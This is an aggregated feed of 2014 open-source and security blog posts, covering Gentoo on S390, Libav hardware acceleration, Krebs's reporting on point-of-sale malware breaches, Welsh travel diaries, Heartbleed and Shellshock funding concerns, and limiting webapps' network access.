
Thanks to Marist College, IBM and the Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials on their procedure.

So for most of last year, and over the last few weeks, I've been polishing and finishing the documentation I had lying around. What I've documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both guides follow the same pattern.

Gentoo S390 on the Hercules emulator

This is probably the guide that will be more interesting, because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system; it's like QEMU. However, QEMU, from what I can tell, is unable to emulate an S390 system on a non-S390 host, while Hercules can.

So if you want to have some fun and emulate an S390 machine on your computer, and install and use Gentoo in it, then follow the guide: https://wiki.gentoo.org/wiki/S390/Hercules

Gentoo S390 on z/VM

For those who have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo system working. Thanks to Dave Jones I was able to create the guide and test the release materials; he even gave a presentation at the 2013 VM Workshop! Link to the PDF. Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is: https://wiki.gentoo.org/wiki/S390/Install

I have also written some tips and tricks for z/VM: https://wiki.gentoo.org/wiki/S390/z/VM_tips_and_tricks They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the stage3 autobuilds for s390, but we lacked a boot environment for installing Gentoo. This boot environment/release material is simply a kernel and an initramfs built with Gentoo's genkernel, based on busybox. It provides a busybox environment like the livecd on amd64/x86 or other architectures. I've integrated the build of this boot environment with the autobuilds, so each week there should be an updated installation environment.

Have fun!


FreeBSD 10.1-RC2 Available

by Webmaster Team via FreeBSD News Flash »

The second RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

VDD14 Discussions: HWAccel2

by lu_zero via Luca Barbato »

I took part in the VideoLAN Dev Days 14 some weeks ago; sadly I have been too busy, so the posts about it will appear in scattered order and somewhat delayed.

Hardware acceleration

In multimedia, video is basically about crunching numbers to get pixels, or crunching pixels to get numbers. Most of the operations are quite time-consuming on a general-purpose CPU and orders of magnitude faster if done using a DSP or hardware designed for that purpose.

Availability

Most commonly used systems have video decoding and encoding capabilities, either embedded in the GPU or in separate hardware. Leveraging them spares lots of CPU cycles, and lots of battery if we are talking about mobile.

Capabilities

The usually specialized hardware has the drawback of being inflexible, and that clashes with the fact that most codecs evolve quite quickly, with additional profiles to extend their capabilities, support different color spaces, use additional encoding strategies and so on. Software decoders and encoders are still needed, and needed badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code lurking from our dark past) without much direction, addressing short-term problems and not really documenting how to use it.

As a result, all the people who dared to use it had to guess, usually relied on internal symbols they shouldn't have had to use, and all in all spent lots of time on it and got plenty of grief when such internals changed.

Usage
Every backend required quite a large amount of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring the user to override get_format and get_buffer in certain ways.

Overall, to get the whole thing working the library user was supposed to do about 75% of the work. Not really nice, considering people use libraries to abstract complexity and avoid repetition.

Backend support
As that support was written with only slice-based decoders in mind, it expects that every backend will require the software decoder to parse the bitstream, prepare slices of the frame and feed them to the backend.

Sadly, new backends appeared that directly take either the bitstream or full frames; the approach so far had been to just take the slice, add back the bitstream markers the backend library expects, and be done with it.

Initial HWAccel 2 discussion

Last year, since the backends I wanted to support were all bitstream-oriented and did not fit that model at all, I started thinking about it, and the topic got discussed a bit during VDD 13. Some people who had spent their dear time getting hwaccel1 working with their software were quite wary of radical changes, so a path of incremental improvements got more or less laid down.

HWAccel 1.2
  • default functions to allocate and free the backend context, and an extensible struct for the interface between Libav and the backend, so it can grow without causing breakage.
  • avconv can now use some hwaccels, providing at least an example of how to use them and a means to test without having to gut VLC or mpv to experiment.
  • better documentation for the old-style hwaccels, so at least some mistakes can be avoided (and code that happens to work by sheer luck won't break once the faulty assumptions cease to exist).
The new VDA backend and the updated VDPAU backend are examples of this.

HWAccel 1.3
  • extend the callback system to decently fit bitstream-oriented backends.
  • provide an example of a backend directly providing normal AVFrames.
The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get closer to the end result: casual users should not have to write boilerplate code to use hwaccel and get at least some performance boost, while power users should still have full access to the underpinnings so they can get the most out of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOptions to set specific keys such as hwaccel and, optionally, hwaccel-device, and the library will take care of everything. The frames returned by avcodec_decode_video2 will be backed by normal system memory and use commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and the like will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to completely separate the hwaccel path from the software path, and specific functions will be provided to hand over the ownership of backend contexts and surfaces.

The software fallback won't be automagic anymore in this case; instead a specific AVERROR_INPUT_CHANGED will be returned, so it is cleaner for the user to reset the decoder without losing the display that may have been sharing the same context. This leads the way to a simpler means of supporting multiple hwaccel backends and falling back from one to the other, and eventually to software decoding.

Migration path

We try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 will in general result in fewer lines of code in the application; people wanting to keep their callbacks just need to set them after avcodec_open2 and move the pixel-specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make managing the backend-specific resources much simpler.

Expected Time of Arrival

Right now the review is on HWAccel 1.3; I hope to complete this step and add a few new backends to test how good or bad that API is before adding the other steps. HWAccel2 will probably take at least another six months.

Help in form of code or just moral support is always welcome!

Netflix on Gentoo

by admin via Mike Pagano's Weblog »

Contrary to some articles you may read on the internet, Netflix is working great on Gentoo.

Here’s a snapshot of my system running 3.12.30-gentoo sources and Google Chrome version 39.0.2171.19_p1.

$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0

Malware Based Credit Card Breach at Kmart

by BrianKrebs via Krebs on Security »

Sears Holding Co. late Friday said it recently discovered that point-of-sale registers at its Kmart stores were compromised by malicious software that stole customer credit and debit card information. The company says it has removed the malware from store registers and contained the breach, but that the investigation is ongoing.

“Yesterday our IT teams detected that our Kmart payment data systems had been breached,” said Chris Brathwaite, spokesman for Sears. “They immediately launched a full investigation working with a leading IT security firm. Our investigation so far indicates that the breach started in early September.”

According to those investigators, Brathwaite said, “our systems were infected with a form of malware that was currently undetectable by anti-malware systems. Our IT teams quickly removed that malware, however we do believe that debit and credit card numbers have been compromised.”

Brathwaite stressed that the data stolen included only “track 2” data from customer credit and debit cards, and did not include customer names, email address, physical address, Social Security numbers, PINs or any other sensitive information.

However, he acknowledged that the information stolen would allow thieves to create counterfeit copies of the stolen cards. So far, he said, Sears has no indication that the cards are yet being fraudulently used.

Sears said it has no indication that any Sears, Roebuck customers were impacted, and that the malware infected the payment data systems at Kmart stores only.

More on this developing story as updates become available. For now, see this notice on Kmart’s home page.

Dairy Queen Confirms Breach at 395 Stores

by BrianKrebs via Krebs on Security »

Nationwide fast-food chain Dairy Queen on Thursday confirmed that malware installed on cash registers at some 395 stores resulted in the theft of customer credit and debit card information. The acknowledgement comes nearly six weeks after this publication first broke the news that multiple banks were reporting indications of a card breach at Dairy Queen locations across the country.

In a statement issued Oct. 9, Dairy Queen listed nearly 400 DQ locations and one Orange Julius location that were found to be infected with the widely-reported Backoff malware that is targeting retailers across the country.

Curiously, Dairy Queen said that it learned about the incident in late August from law enforcement officials. However, when I first reached out to Dairy Queen on Aug. 22 about reports from banking sources that the company was likely the victim of a breach, the company said it had no indication of a card breach at any of its 4,500+ locations. Asked about the apparent discrepancy, Dairy Queen spokesman Dean Peters said that by the time I called the company and inquired about the breach, Dairy Queen’s legal team had indeed already been notified by law enforcement.

“When I told you we had no knowledge, I was being truthful,” Peters said. “However, I didn’t know at that time that someone [from law enforcement] had already contacted Dairy Queen.”

In answer to inquiries from this publication, Dairy Queen said its investigation revealed that the same third-party point-of-sale vendor was used at all of the breached locations, although it declined to name the affected vendor. However, multiple sources contacted by this reporter said the point-of-sale vendor in question was Panasonic Retail Information Systems.

In response to questions from KrebsOnSecurity, Panasonic issued the following non-denial statement:

“Panasonic is proud that we can count Dairy Queen as a point-of-sale hardware customer. We have seen the media reports this morning about the data breaches in a number of Dairy Queen outlets. To the best of our knowledge, these types of malware breaches are generally associated with network security vulnerabilities and are not related to the point-of-sale hardware we provide. Panasonic stands ready to provide whatever assistance we can to our customers in resolving the issue.”

The Backoff malware that was found on compromised Dairy Queen point-of-sale terminals is typically installed after attackers compromise remote access tools that allow users to connect to the systems over the Internet. All too often, the user accounts for these remote access tools are protected by weak or easy-to-guess username and password pairs.

The incident at DQ fits a pattern of breaches involving retail chains that rely heavily on franchisees and poorly-secured point-of-sale products which allow remote access over the Internet. On Sept. 24, nationwide sandwich chain Jimmy John’s confirmed reports first published in this blog about a likely point-of-sale breach at the company’s stores. While there are more than 1,900 franchised Jimmy John’s locations, only 216 were hit, and they were all running the same point-of-sale software from Newtown, Pa. based Signature Systems. On Sept. 26, Signature disclosed that at least 100 other mom-and-pop restaurants that it serves were compromised through its point-of-sale systems.

Earlier in September, KrebsOnSecurity reported that a different hacked point-of-sale provider was the driver behind a breach that impacted more than 330 Goodwill locations nationwide. That breach, which targeted payment vendor C&K Systems Inc., persisted for 18 months, and involved two other as-yet unnamed C&K customers.

Dairy Queen said that it will be offering free credit monitoring services to affected customers. This has become the standard response for companies trying to burnish their public image in the wake of a card breach, even though credit monitoring services do nothing to help consumers detect or prevent fraud on existing accounts — such as credit and debit cards.

There is no substitute for monitoring your monthly bank and credit card statements for unauthorized or suspicious transactions. If you’re looking for information about how to protect yourself or loved ones from identity thieves, check out the tips in the latter half of this article.

Signed Malware = Expensive “Oops” for HP

by BrianKrebs via Krebs on Security »

Computer hardware and software maker HP is in the process of notifying customers about a seemingly harmless security incident in 2010 that nevertheless could prove expensive for the company to fix and present unique support problems for users of its older products.

Earlier this week, HP quietly produced several client advisories stating that on Oct. 21, 2014 it plans to revoke a digital certificate the company previously used to cryptographically sign software components that ship with many of its older products. HP said it was taking this step out of an abundance of caution because it discovered that the certificate had mistakenly been used to sign malicious software way back in May 2010.

Code-signing is a practice intended to give computer users and network administrators additional confidence about the integrity and security of a file or program. Consequently, private digital certificates that major software vendors use to sign code are highly prized by attackers, because they allow those attackers to better disguise malware as legitimate software.

For example, the infamous Stuxnet malware – apparently created as a state-sponsored project to delay Iran’s nuclear ambitions — contained several components that were digitally signed with certificates that had been stolen from well-known companies. In previous cases where a company’s private digital certificates have been used to sign malware, the incidents were preceded by highly targeted attacks aimed at stealing the certificates. In Feb. 2013, whitelisting software provider Bit9 discovered that digital certificates stolen from a developer’s system had been used to sign malware that was sent to several customers who used the company’s software.

But according to HP’s Global Chief Information Security Officer Brett Wahlin, nothing quite so sexy or dramatic was involved in HP’s decision to revoke this particular certificate. Wahlin said HP was recently alerted by Symantec about a curious, four-year-old trojan horse program that appeared to have been signed with one of HP’s private certificates and found on a server outside of HP’s network. Further investigation traced the problem back to a malware infection on an HP developer’s computer.

HP investigators believe the trojan on the developer’s PC renamed itself to mimic one of the file names the company typically uses in its software testing, and that the malicious file was inadvertently included in a software package that was later signed with the company’s digital certificate. The company believes the malware got off of HP’s internal network because it contained a mechanism designed to transfer a copy of the file back to its point of origin.

Wahlin stressed that the software package in question was never included in software that was shipped to customers or put into production. Further, he said, there is no evidence that any of HP’s private certs were stolen.

“When people hear this, many will automatically assume we had some sort of compromise within our code signing infrastructure, and that is not the case,” he said. “We can show that we’ve never had a breach on our [certificate authority] and that our code-signing infrastructure is 100 percent intact.”

Even if the security concerns from this incident are minimal, the revocation of this certificate is likely to create support issues for some customers. The certificate in question expired several years ago, and so it cannot be used to digitally sign new files. But according to HP, it was used to sign a huge swath of HP software — including crucial hardware and software drivers, and other components that interact in fundamental ways with the Microsoft Windows operating system.

Thus, revoking the certificate means that HP must re-sign software that is already in use. Wahlin said most customers impacted by this change will merely encounter warnings from Windows if they try to reinstall certain drivers from original installation media, for example. But a key unknown at this point is how this move will affect HP computers that have built-in “recovery partitions” — small sections at the beginning of the computer’s hard drive that can be used to restore the system to its original, factory-shipped software configuration.

“The interesting thing that pops up here — and even Microsoft doesn’t know the answer to this — is what happens to systems with the restore partition, if they need to be restored,” Wahlin said. “Our PC group is working through trying to create solutions to help customers if that actually becomes a real-world scenario, but in the end that’s something we can’t test in a lab environment until that certificate is officially revoked by Verisign on October 21.”

A Day by the Sea

by André M. via My Universe »

Having grown up by the sea, I naturally can't last long without salt in the air, and certainly not when the sea is this close! So yesterday I headed to Barry on the Bristol Channel. It poured with rain for the entire drive, but as soon as I could see the sea the clouds cleared and the town greeted me with a beautiful rainbow, which sadly I couldn't photograph for lack of a parking spot.

According to my tourist road map there were supposed to be a few historic sites there, but since the town council had gone to the trouble of advertising "Barry Island" and its attractions several kilometr... er, miles before the town, I changed my plans on the spot and followed the well-signposted route to the "island", which is really just two peninsulas (but do two halves make ...?). The huge tourist car park was of course completely empty, so I didn't park my car there but right by the beach instead. Holidaying out of season does have its advantages.

Getting out of the car, I immediately noticed that while the rain had stopped, a proper storm had picked up instead. Perfect weather, in other words. It quickly became clear that the tide was going out: plenty of "beach", mussel-covered rocks lying dry, and waves that despite the strong wind practically "stood still" are fairly clear signs.

One bay further on lay Barry's old harbour, with four small to very small boats in the middle of the basin, of which at most two were obviously still able to float, and all of them sitting in mud between tough grasses. No water anywhere in the harbour. And the harbour entrance didn't give much hope in that respect either, given a large mound of beach sand that had evidently been washed up there over the years.

Since another shower was rolling in, I quickly fled into a restaurant for a rather meagre (and hopelessly overpriced) little "Cajun chicken" salad. Elsewhere that would pass as a starter, and it was supposed to cost 6 pounds. I'd rather cook myself something proper in the evening! At least the sun came out again after the meal, so I drove into Barry's town centre, where incidentally you can park for free in the multi-storey car park right by the pedestrian zone. Apart from the town hall and the harbour office at the new harbour there isn't really much to see there. But all in all it's a nice, typically British-looking town with many streets full of nearly identical terraced houses. Yes, it really does look the way it always does on television!

After a leisurely stroll the sun was already quite low, and I figured that in this light there would surely be some nice pictures to be taken of the shipwrecks in the old harbour, so I went back. To my surprise I could see from afar that storm and tide had already pushed the water up to the crest of the sandbank at the harbour entrance. It was only a matter of time before the basin would fill with water! So in the most beautiful weather I spent the next half hour (or so) in the light of the setting sun watching how its forces interact with those of the moon and the wind.

Today, unfortunately, the weather was properly nasty. "Nasty" in the sense of "sneaky, mean": time and again the sun peeked through the clouds for a few moments, but no sooner had you grabbed your jacket and put on your shoes than it was gone again. As soon as you set foot outside the door it started pouring as if there were no tomorrow. Once you were back inside and dry, it promptly stopped. That way I managed to get soaked three times, even though I've spent maybe 5 minutes outdoors in total so far (each time on the way to or from the car). But the weather forecast says it should get better again tomorrow; we'll see.

Until then

André

Greetings from Wales

by André M. via My Universe »

Hello from Wales!

I'm travelling again, this time in Wales. And since at this time of year postcards are as hard to find here as other tourists, I thought I'd let you share in what I get up to here every day, in case the promised postcards don't work out.

The story so far ...

On Monday (the day before yesterday), despite an extremely delayed departure and after a rather bumpy flight, I arrived at Heathrow shortly after 3pm. Quickly picked up the car, a VW Golf diesel whose only missing extra is cruise control, and off onto the M4 towards "SOUTH WALES". Just before Wales came a brief scare: the bridge over the River Severn, or rather its estuary into the Bristol Channel, is a toll bridge. And I didn't have any cash on me yet. So on a whim I took the last exit to look for a cash machine ... which turned out to be a motorway junction with the M48. So the next exit then ... unfortunately an interchange with the M5. New game, new luck? Well, the queue in the left lane at least looked promising. And only 30 minutes later I was at a service station.

Freshly fortified (do they really use so little salt on everything here?) and with a few notes of Monopoly money ... er ... pounds sterling in my pocket, it was back onto the motorway. At least all the traffic jams that had been reported on the radio earlier had disappeared in the meantime. The bridge itself: quite an experience! A pity that I couldn't find a lay-by for taking photos either before or after it (let alone "somewhere on the bridge"). I'll definitely try to make up for that when I get the chance!

Around half past seven I finally arrived at my destination: Taff's Well, north of Cardiff. A great place to stay and friendly hosts, although "Railway Cottage" turned out to be a far more literal name than I had originally thought: while the bedroom faces the village road (which unfortunately is fairly busy during the day), the Cardiff-Pontypridd train passes practically right in front of the living room (about 10 metres away) every 10 minutes. At least it's quiet at night, which also means, however, that after 11pm there's no way to get out of Cardiff by train.

On Tuesday morning I slept in and then, around 11am, woke Elisa, who is currently studying in Cardiff and lives in the neighbouring village. After an extensive "Welsh breakfast" she had to go to university and I set off to explore the area a little. My plan was actually to drive cross-country, avoiding the countless motorways here, to Coch Castle. Somehow I ended up on the M4 west of Cardiff instead ... so motorway after all; first back towards Taff's Well and then I followed the signs to the castle. Not that hard, really, at least at the beginning. But suddenly, with the castle already far behind me, no more signs. Instead, narrow mountain roads and rather optimistic, though always very friendly, local drivers. Then suddenly signs again, but as it turned out they led to Caerphilly Castle. Fine by me. I even found the car park there straight away, and despite misleading signage the footpath to the castle too. A fantastic building that I absolutely have to see from the inside some time! Because of the late hour there was only time for a walk around the outside on this occasion. And since I had to pass Coch Castle on the way back to my accommodation anyway, I gave it a second try, and even found, by pure chance, the walkers' car park from which you can continue to the castle on foot! Well, that too will have to wait for another day.

In the evening a little trip to Cardiff, actually with the aim of meeting Elisa and a few of her fellow students. The latter didn't show up, though, so we found ourselves a pub, brought each other up to date and made plans for the next few days. The way back ... well, a small odyssey across Cardiff's countless expressways ... After I had turned off the roundabouts too early about ten times (each time while trying to turn around), Elisa took over reading the TomTom, and lo and behold ...

So much for now; today I want to head for the water. And given the density of castles around here, there is bound to be a castle to visit there as well.

See you tomorrow!

André

py3status v1.6

by ultrabug via Ultrabug »

Back from holidays, this new version of py3status was long overdue, as it features a lot of great contributions!

This version is dedicated to the amazing @ShadowPrince, who contributed 6 new modules!

Changelog

  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying the current window's title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module clementine.py: Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman

Contributors

Huge thanks to this release's contributors:

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What's next?

The next 1.7 release of py3status will bring a neat and cool feature which I'm sure you'll love. Stay tuned!

How to stop Bleeding Hearts and Shocking Shells

by Hanno Böck via Hanno's blog »

The free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs were quite different, I think they still share a lot.

Heartbleed hit the news in April this year: a bug in OpenSSL that allowed attackers to extract the private keys of encrypted connections. When a bug in Bash called Shellshock hit the news, I was at first hesitant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big, there were some things that alleviated the impact. It took some days until people found out how to practically extract private keys, and it still wasn't fast. And the most likely attack scenario, stealing a private key and pulling off a man-in-the-middle attack, seemed like something that would still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: the OpenSSL project wasn't in good shape. The software that pretty much everyone on the Internet uses for encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, because I tried it). The truth about Bash looks even grimmer: it's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that power the Internet. Yet they are very small projects backed by few people. Besides, they are both quite old; you'll find tons of legacy code in them written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However, I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much more secure than it ever was, and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed- or Shellshock-like bug will happen, ask this: what projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and have received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: take your favorite Linux distribution, make a minimal installation without anything extra and look at what's installed. These are the software projects you should worry about. To make things easier, I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things: some of these provide more attack surface than others, and we should probably worry most about the ones that are directly involved in providing network services.
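If you want to repeat the experiment on your own system, something along these lines should do; the exact command of course depends on your distribution and package manager:

qlist -I                              # Gentoo: list every installed package (needs app-portage/portage-utils)
dpkg-query -W -f='${Package}\n'       # Debian/Ubuntu: the same, e.g. inside a minimal debootstrap chroot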

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted, and the result is the Core Infrastructure Initiative by the Linux Foundation, which has already helped improve OpenSSL development. This is a great start and an example of the kind of initiative we should have more of. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: a thorough security audit of a project like Bash would probably require a five-figure number of dollars. For a small, volunteer-driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed, people started having a closer look at OpenSSL and found a number of small issues and one other quite severe one. After Bash, people instantly found more issues in the function parser, and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug, people start to look for more. I wonder what it would take to get people looking at the projects that aren't in the spotlight.

I was brainstorming whether we could have something like a "free software audit action day": a regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now; if you like it, please leave a comment.

That's it. I refrain from having discussions about whether bugs like Heartbleed or Shellshock disprove the "many eyes" principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:

bzip2
gzip
tar
unzip
xz-utils
nano
ca-certificates
mime-types
pax-utils
bash
build-docbook-catalog
docbook-xml-dtd
docbook-xsl-stylesheets
openjade
opensp
po4a
sgml-common
perl
python
elfutils
expat
glib
gmp
libffi
libgcrypt
libgpg-error
libpcre
libpipeline
libxml2
libxslt
mpc
mpfr
openssl
popt
Locale-gettext
SGMLSpm
TermReadKey
Text-CharWidth
Text-WrapI18N
XML-Parser
gperf
gtk-doc-am
intltool
pkgconfig
iputils
netifrc
openssh
rsync
wget
acl
attr
baselayout
busybox
coreutils
debianutils
diffutils
file
findutils
gawk
grep
groff
help2man
hwids
kbd
kmod
less
man-db
man-pages
man-pages-posix
net-tools
sed
shadow
sysvinit
tcp-wrappers
texinfo
util-linux
which
pambase
autoconf
automake
binutils
bison
flex
gcc
gettext
gnuconfig
libtool
m4
make
patch
e2fsprogs
udev
linux-headers
cracklib
db
e2fsprogs-libs
gdbm
glibc
libcap
ncurses
pam
readline
timezone-data
zlib
procps
psmisc
shared-mime-info

Testers: CentOS 6.5 Emulation and New AppCafe

by dru via Official PC-BSD Blog »

For those of you on Edge and who wish to test the new Linux emulation and the new Appcafe, Kris has posted the instructions:

CentOS 6.5 emulation has been made the default for the EDGE packages going out this weekend. This replaces the legacy f10 package set. I’ve tested / confirmed that Flash works properly, haven’t tried net-im/skype4 yet, but a package is available for those who want to try.

I’ve seen a few issues doing the update here with PKG. It seems often the conflict detection won’t remove f10 on its own, so I’ve had to do this:

# pkg update -f
# pkg delete linux_base-f10\*
# pkg install nvidia-driver (Skip this if you don’t use nvidia drivers)
# pkg install pcbsd-base
# pkg upgrade
# pc-extractoverlay ports
# reboot

After reboot, you need to recreate the flash plugin:

% flashpluginctl off && flashpluginctl on

Let us know any issues you see with the newer linux emulation layer.

Also, if you run into problems launching / navigating the newer AppCafe, please open bug reports asap. We are working to stabilize that as quickly as possible. Bug reports should be created at bugs.pcbsd.org.


rndc: neither /usr/local/etc/rndc.conf nor /usr/local/etc/rndc.key was found

by Dan Langille via Dan Langille's Other Diary »

In this post, I’m using bind98-9.8.8 from ports on FreeBSD 9.3, in case that helps you. Today, I was adjusting the pgcon.org domain as part of the move from the old server to the new server. This move would also see the website updated to PGCon 2015 and the use of Ansible for configuring that [...]

gelt

by Dan Langille via Dan Langille's Other Diary »

For future reference. This server formed the backbone of just about everything I did. It hosted about 13 domains. Sadly, it was i386 and would not do for ZFS. Copyright (c) 1992-2014 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All [...]

FreeBSD 10.1-RC1 Available

by Webmaster Team via FreeBSD News Flash »

The first RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

Lilblue Linux: release 20140925. Adventures beyond the land of POSIX.

by blueness via Anthony G. Basile »

It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It's a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students were writing their exams in Modern OS, I entertained myself by just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it up to the point where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that's another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE64
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate
#endif

/*
 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
    return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE */
The idea was that, if a configure test for fallocate64() failed because it isn't available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc's indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture and ABI dependent, and the above is broken on 32-bit systems [8].  Of course, uClibc didn't have fallocate() so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate() so this wasn't a problem there, even though it is a Linux-specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate() which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() in mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts'o since he was worried that some libc might implement posix_fallocate() by brute force writing 0s.  That could be horribly slow for large allocations!  This wasn't the case for uClibc's implementation but that didn't seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc's 0.9.33 branch now has the fix as well.  Because there hasn't been a release of uClibc in about two years, I'm using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved; I know it's a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to vapier's patchset that he maintains for the uClibc ebuilds.  Since my uClibc stage3s don't use the 0.9.33 branch head, but the stable tree ebuilds which use the vanilla 0.9.33.2 release plus Mike's patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pita, but this is exactly the sort of issue I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don't have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from the experimental/amd64/uclibc directory of any mirror [11].


Does your webapp really need network access?

by Flameeyes via Flameeyes's Weblog »

One of the interesting things I noticed after shellshock was the number of vulnerability probes that counted on webapp users having direct network access. Not just pings to known addresses to verify the vulnerability, or wget or curl requests with unique IDs, but even very rough nc or /dev/tcp connections to hand out remote shells. The fact that such probes are out there makes it reasonable to expect that on at least some of the targeted systems they actually worked.

This piqued my interest because I realized that most people don't take the one obvious step to mitigate this kind of problem: removing (or at least limiting) their web apps' access to the network. So I decided it might be worth describing for a moment why you should think about that. This is partly because I found out last year at LISA that not all sysadmins have enough development training to immediately pick up how things work, and partly because I know that even if you're a programmer it might be counterintuitive to think that web apps should not have access, well, to the web.

